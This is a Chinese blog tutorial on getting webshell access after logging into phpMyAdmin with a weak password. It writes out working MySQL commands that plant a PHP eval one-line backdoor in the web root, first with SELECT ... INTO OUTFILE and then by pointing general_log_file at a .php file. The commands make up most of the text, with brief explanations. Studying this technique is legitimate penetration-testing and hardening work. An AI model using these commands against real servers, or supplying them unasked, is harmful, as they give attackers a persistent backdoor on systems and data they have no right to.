首页 > 编程语言 >拿到phpMyAdmin如何获取权限

拿到phpMyAdmin如何获取权限

时间:2023-11-25 17:37:45浏览次数:32  
标签:phpMyAdmin log global general 拿到 outfile file 权限

目录

通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

image-20231023210312344

image-20231023210353375

如果执行失败show variables like "%secure%"; 查看配置

image-20231023210727393

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

image-20231023204626426

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

set global general_log_file=“网站绝对路径/文件名”;

image-20231023204850257

SELECT "<?php @eval($_POST[1])?>"

image-20231023204934826

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

image-20231023211035433

标签:phpMyAdmin,log,global,general,拿到,outfile,file,权限
From: https://www.cnblogs.com/saury/p/17855763.html

相关文章

  • 前端项目实战壹佰陆拾贰react-admin+material ui-react-admin之usePermissions之刷新
    我是歌谣放弃很容易但是坚持一定很酷微信公众号关注前端小歌谣带你进入前端技术群constGrantAdminPermissionsButton=()=>{constrecord=useRecordContext();const[update]=useUpdate();const{refetch}=usePermissions();consthandleCli......
  • 文件权限
    1.掌握基本权限用法1.1基本权限UGOUGO是基本权限的一种表示方式,它代表了拥有者(User)、组(Group)和其他用户(Others)的权限。在UGO中,每个权限用一个字符来表示,分别是:-r:读权限(Read)-w:写权限(Write)-x:执行权限(Execute)--:没有该权限UGO表示法使用三个字符来表示拥有者、组和其他用户的......
  • 拯救迅速遗忘的文件权限
    Linux文件权限在Linux系统中,文件权限是保护文件和目录安全的重要机制之一。理解和正确设置文件权限对于系统管理员和用户来说至关重要。本文将介绍Linux文件权限的基础知识和常见操作。文件权限概述Linux系统中的每个文件和目录都与它们相关联的一组权限。这些权限控制着对文件......
  • Linux文件权限
    通过学习Linux文件权限章节,我深刻认识到了文件权限在Linux系统中的重要性。文件权限是Linux系统中的一个核心概念,它决定了用户对文件和目录的访问权限。因此,对于Linux系统管理员来说,文件权限是必须要掌握的技能之一。在这个章节中,我学习了Linux文件权限的基础知识,包括文......
  • CQ 社区版 V2.6.0 发布 | SQL闪回、权限看板、新增数据源人大金仓等
    HELLO,大家好,又到了CloudQuery社区版发版时间!本次更新版本为v2.6.0,亮点多多,我们直入主题一起来看!本期亮点新增3种数据源支持V2.6.0,新增三种国产数据源支持:人大金仓(forOracle/PG)(8.6.0)、Gbase(3.3.0.2)、神州通用(7.0.8),对这些数据源支持权限管控、数据保护、审计分析等。目前V2.6......
  • Android新手必学-关于权限的申请
    引言在Android应用开发中,权限管理是一个至关重要的方面。Android系统为了保护用户的隐私和安全,对应用程序的访问权限进行了严格的控制。作为一名Android新手开发者,了解和正确处理权限是至关重要的。本文将介绍Android权限的概念、权限的分类以及如何在应用程序中正确申请和处理权限......
  • Android 动态申请 权限 permission
    文章目录1、单个权限动态申请1)文件结构2)在AndroidManifest.xml添加权限3)在代码里进行权限检查和申请2、多个权限动态申请1)在AndroidManifest.xml添加权限2)、CheckPermission文件3)在MainActivity文件里面调用CheckPermission1、单个权限动态申请以SD卡读写权限......
  • linux文件权限2
    基本权限ACLACL主要提供传统的UGO的r,w,x权限之外的具体权限,可以对单一用户,单一文件,或者目录进行文件权限设置ACL的基本使用方式getfacl查看权限setfacl设置权限选项-m 设定ACL的权限-x 删除某一用户或组的ACL权限-......
  • Linux文件权限
    一、文件权限文件的权限针对三类对象进行定义owner属主,缩写ugroup属组,缩写gother其他,缩写o每个文件针对每类访问者定义了三种主要权限r:Read读w:Write写x:eXecute执行对于文件和目录来说,r,w,x有着不同的作用和含义:针对文件:r:读取文件内容w:修改文件内容x:执行......
  • springboot 集成swagger3.0 并开启权限认证
    1.POM文件只需要引入一个依赖即可  2.swagger配置文件如下注意:要添加“@EnableWebMvc"注解,详细代码如下:@Configuration@EnableWebMvcpublicclassSwaggerConfig{@Value("${swagger.enabled}")booleanenabled;@BeanpublicDocketdocket(){r......